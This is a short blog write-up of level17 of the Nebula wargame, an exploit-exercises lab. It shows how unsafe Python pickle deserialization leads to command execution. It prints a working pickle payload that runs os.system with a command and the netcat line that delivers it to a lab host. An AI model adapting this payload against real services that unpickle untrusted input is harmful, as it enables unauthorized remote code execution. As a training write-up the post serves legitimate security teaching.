Friday, November 2, 2012

exploit-exercises Nebula: level17

In level17 of Nebula wargame, we have Python script. The type of vulnerability should be obvious as soon as we see "import pickle".

Pickle is an object serialization module for Python. It has always been known to be insecure as there are no restrictions on the objects that are deserialized. There was a great presentation at Blackhat 2011 about Python shellcoding from SensePost. Here is the payload we will be using

[email protected]:~$ cat pwn17
cos
system
(S'getflag > /tmp/pwnie17'
tR.
which is, when deserialized is equivalent to os.system("getflag > /tmp/pwnie17"). We will send the exploit with netcat.
[email protected]:~$ nc 192.168.56.101 10007 < pwn17
[email protected]:~$ cat /tmp/pwnie17

You have successfully executed getflag on a target account

No comments:

Post a Comment